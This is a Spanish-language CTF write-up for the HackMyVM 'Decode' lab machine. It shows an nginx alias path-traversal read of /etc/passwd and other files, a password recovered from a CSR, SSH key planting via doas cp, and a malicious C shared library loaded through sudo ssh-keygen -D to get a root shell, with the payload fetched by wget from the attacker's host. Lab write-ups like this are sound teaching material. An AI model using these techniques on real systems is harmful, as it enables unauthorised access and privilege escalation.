cd ~/blog

~/writeups/hmv/059-decode.md

059 - Decode

easy Linux hmv 31-03-2024
nginx off-by-slash alias LFICSR credential decodingdoas cp + authorized_keys injectionsudo ssh-keygen -D shared library injection
hackmyvm.eu/machines/machine.php?vm=Decode

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.26
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.26
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-31 19:05 -03
Nmap scan report for 192.168.1.26
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
|   256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_  256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Welcome to nginx!
| http-robots.txt: 1 disallowed entry
|_/encode/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.47 seconds
 gobuster dir -u 'http://192.168.1.26' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png -r
...
/decode               (Status: 200) [Size: 654]
/robots.txt           (Status: 200) [Size: 240]
...

El robots.txt está lleno de pistas (decode, ../, /lfi../, passwd...):

 cat robots.txt
User-agent: decode
Disallow: /encode/

User-agent: *
Allow: /
Allow: /decode
Allow: ../
Allow: /index
Allow: .shtml
Allow: /lfi../
Allow: /etc/
Allow: passwd
Allow: /usr/
Allow: share
Allow: /var/www/html/
Allow: /cgi-bin/
Allow: decode.sh

Esto apunta a un off-by-slash de nginx (un alias mal configurado permite traversal con decode../). Lo confirmamos leyendo /etc/passwd:

 curl 'http://192.168.1.26/decode../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
steve:$y$j9T$gbohHcbFkUEmW0d3ZeUx40$Xa/DJJdFujIezo5lg9PDmswZH32cG6kAWP.crcqrqo/:1001:1001::/usr/share:/bin/bash
decoder:x:1002:1002::/home/decoder:/usr/sbin/nologin
ajneya:x:1003:1003::/home/ajneya:/bin/bash

Obtenemos el hash de steve y, leyendo su .bash_history, descubrimos una pista hacia un CSR:

 curl 'http://192.168.1.26/decode../usr/share/.bash_history'
rm -rf /usr/share/ssl-cert/decode.csr

Leemos el CSR y lo decodificamos (con certlogik decoder), que revela la contraseña de steve en un campo:

 curl 'http://192.168.1.26/decode../usr/share/ssl-cert/decode.csr'
-----BEGIN CERTIFICATE REQUEST-----
MIIDAzCCAesCAQAwSDERMA8GA1UEAwwISGFja015Vk0xDzANBgNVBAgMBmRlY29k
...
-----END CERTIFICATE REQUEST-----

UTF8String 'i4mD3c0d3r'

Con steve:i4mD3c0d3r accedemos por SSH e iniciamos la escalada con sudo -l:

steve@decode:/home$ sudo -l
Matching Defaults entries for steve on decode:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steve may run the following commands on decode:
    (decoder) NOPASSWD: /usr/bin/openssl enc *, /usr/bin/tee

También buscamos binarios SUID y encontramos doas:

steve@decode:/home/steve$ find / -perm -4000 2>/dev/null
...
/usr/bin/doas
...

steve@decode:/home/steve$ cat /etc/doas.conf
permit nopass steve as ajneya cmd cp

steve puede ejecutar cp como ajneya vía doas. Generamos una clave SSH y colocamos nuestro authorized_keys en el home de ajneya:

 ssh-keygen
...
 cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCm67CXrgAM9n34I+kG4ZYOpkx3Eu/AEJIvZe9z09Cbb7q... wh01s17@wh01s17-laptop
steve@decode:/tmp$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCm67CXrgAM9n34I+kG4ZYOpkx3Eu/AEJIvZe9z09Cbb7q... wh01s17@wh01s17-laptop" > authorized_keys

steve@decode:/tmp$ chmod 777 authorized_keys
steve@decode:/tmp$ mkdir .ssh
steve@decode:/tmp$ mv authorized_keys .ssh/
steve@decode:/tmp$ doas -u ajneya cp -r .ssh/ /home/ajneya

Nos conectamos como ajneya y obtenemos la primera flag:

 ssh ajneya@192.168.1.26
Enter passphrase for key '/home/wh01s17/.ssh/id_rsa':
Linux decode 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64
...
ajneya@decode:~$

Revisamos sus permisos sudo:

ajneya@decode:~$ sudo -l
Matching Defaults entries for ajneya on decode:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ajneya may run the following commands on decode:
    (root) NOPASSWD: /usr/bin/ssh-keygen * /opt/*

Podemos abusar de ssh-keygen -D <lib.so> (carga una librería PKCS#11 y ejecuta su C_GetFunctionList). Creamos una librería maliciosa:

 cat pwnlib.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
int C_GetFunctionList(void)
{
        setuid(0);
        setgid(0);
        system("/bin/bash");
}

 gcc -shared -o pwnlib.so -fPIC pwnlib.c

La colocamos en /opt/decode/ usando el tee que steve puede ejecutar como decoder:

steve@decode:/tmp$ wget http://192.168.1.10:8000/pwnlib.so
steve@decode:/tmp$ cat pwnlib.so | sudo -u decoder /usr/bin/tee /opt/decode/pwnlib.so

Y desde ajneya la cargamos con ssh-keygen para obtener root:

ajneya@decode:~$ sudo ssh-keygen -D /opt/decode/pwnlib.so
root@decode:/home/ajneya#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados